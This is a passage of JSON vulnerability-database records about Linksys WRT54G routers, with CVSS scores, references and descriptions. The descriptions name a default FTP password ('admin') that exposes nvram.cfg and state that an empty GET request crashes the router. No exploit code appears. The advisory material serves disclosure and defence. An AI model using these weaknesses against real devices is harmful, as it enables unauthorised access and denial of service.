"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-21310"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#930364",
"trust": 3.3
},
{
"db": "SECUNIA",
"id": "21372",
"trust": 2.6
},
{
"db": "NVD",
"id": "CVE-2006-5202",
"trust": 2.5
},
{
"db": "BID",
"id": "19347",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1016638",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "5926",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087",
"trust": 0.7
},
{
"db": "MILW0RM",
"id": "5926",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20060804 LINKSYS WRT54G AUTHENTICATION BYPASS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-21310",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "48845",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "PACKETSTORM",
"id": "48845"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"id": "VAR-200610-0506",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-21310"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:20:05.069000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-5202"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-august/048495.html"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/930364"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/19347"
},
{
"trust": 1.7,
"url": "https://kinqpinz.info/lib/wrt54g/"
},
{
"trust": 1.7,
"url": "https://kinqpinz.info/lib/wrt54g/own2.txt"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1016638"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/21372"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/5926"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/21372/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5202"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-5202"
},
{
"trust": 0.6,
"url": "http://www.milw0rm.com/exploits/5926"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "/archive/1/452020"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "PACKETSTORM",
"id": "48845"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#930364"
},
{
"db": "VULHUB",
"id": "VHN-21310"
},
{
"db": "BID",
"id": "19347"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"db": "PACKETSTORM",
"id": "48845"
},
{
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#930364"
},
{
"date": "2006-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-21310"
},
{
"date": "2006-08-04T00:00:00",
"db": "BID",
"id": "19347"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"date": "2006-08-10T00:40:54",
"db": "PACKETSTORM",
"id": "48845"
},
{
"date": "2006-10-10T04:06:00",
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"date": "2006-08-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-11-21T00:00:00",
"db": "CERT/CC",
"id": "VU#930364"
},
{
"date": "2017-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-21310"
},
{
"date": "2006-11-22T16:00:00",
"db": "BID",
"id": "19347"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-002234"
},
{
"date": "2017-10-11T01:31:18.593000",
"db": "NVD",
"id": "CVE-2006-5202"
},
{
"date": "2006-10-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G routers do not properly validate user credentials",
"sources": [
{
"db": "CERT/CC",
"id": "VU#930364"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access verification error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200610-087"
}
],
"trust": 0.6
}
}
VAR-200803-0060
Vulnerability from variot - Updated: 2023-12-18 10:52

The Linksys WRT54G router has "admin" as its default FTP password, which allows remote attackers to access sensitive files including nvram.cfg, a file that lists all HTML documents, and an ELF executable file. The Linksys WRT54G router is prone to a remote security vulnerability.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0060",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.8,
"vendor": "cisco linksys",
"version": null
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "85075"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1264"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "85075"
}
],
"trust": 0.3
},
"cve": "CVE-2008-1264",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2008-1264",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-31389",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1264",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-142",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-31389",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linksys WRT54G router has \"admin\" as its default FTP password, which allows remote attackers to access sensitive files including nvram.cfg, a file that lists all HTML documents, and an ELF executable file. Linksys WRT54G Router is prone to a remote security vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "BID",
"id": "85075"
},
{
"db": "VULHUB",
"id": "VHN-31389"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1264",
"trust": 2.8
},
{
"db": "XF",
"id": "41126",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142",
"trust": 0.7
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "BID",
"id": "85075",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-31389",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "BID",
"id": "85075"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"id": "VAR-200803-0060",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T10:52:59.565000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41126"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/41126"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1264"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1264"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "BID",
"id": "85075"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31389"
},
{
"db": "BID",
"id": "85075"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31389"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85075"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31389"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85075"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004205"
},
{
"date": "2018-10-11T20:31:24.543000",
"db": "NVD",
"id": "CVE-2008-1264"
},
{
"date": "2008-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G In the router nvram.cfg Vulnerability to access important files such as",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004205"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-142"
}
],
"trust": 0.6
}
}
VAR-200509-0380
Vulnerability from variot - Updated: 2022-05-17 02:02

Multiple vulnerabilities have been identified in Linksys WRT54G routers. These issues all require that an attacker have access to either the wireless or internal LAN network segments of the affected device. Exploitation from the WAN interface is only possible if the affected device has remote management enabled; with remote management disabled, exposure is therefore limited to hosts on the wireless or internal LAN segments.

These issues allow attackers to:
- Download and replace the configuration of affected routers.
- Execute arbitrary machine code in the context of the affected device.
- Utilize HTTP POST requests to upload router configuration and firmware files without proper authentication.
- Degrade the performance of affected devices and cause the Web server to become unresponsive, potentially denying service to legitimate users.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0380",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
}
],
"sources": [
{
"db": "BID",
"id": "14822"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "These vulnerabilities were discovered by Greg MacManus of iDEFENSE Labs.",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple vulnerabilities have been identified in Linksys WRT54G routers. These issue all require that an attacker have access to either the wireless, or internal LAN network segments of the affected device. Exploitation from the WAN interface is only possible if the affected device has remote management enabled.\nThis issue allows attackers to:\n- Download and replace the configuration of affected routers.\n- Execute arbitrary machine code in the context of the affected device.\n- Utilize HTTP POST requests to upload router configuration and firmware files without proper authentication\n- Degrade the performance of affected devices and cause the Web server to become unresponsive, potentially denying service to legitimate users.",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "14822",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "14822"
}
]
},
"id": "VAR-200509-0380",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5353147
},
"last_update_date": "2022-05-17T02:02:57.006000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.linksys.com/"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=306\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=307\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=308\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=305\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026type=vulnerabilities"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
}
],
"sources": [
{
"db": "BID",
"id": "14822"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "14822"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-13T00:00:00",
"db": "BID",
"id": "14822"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-13T00:00:00",
"db": "BID",
"id": "14822"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Wireless Router Multiple Remote Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "14822"
}
],
"trust": 0.3
}
}
VAR-200312-0518
Vulnerability from variot - Updated: 2022-05-17 01:47

The Linksys WRT54G Router is a router device. The Linksys WRT54G Router does not properly handle some GET requests, and a remote attacker can exploit this vulnerability to restart the router. Sending an empty GET request to the router's embedded web server listening on port 80 will cause the router to restart, resulting in a denial of service. It has been reported that when the affected appliance handles a request of this type the embedded web server will halt, requiring the appliance to be power cycled in order to regain normal functionality.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
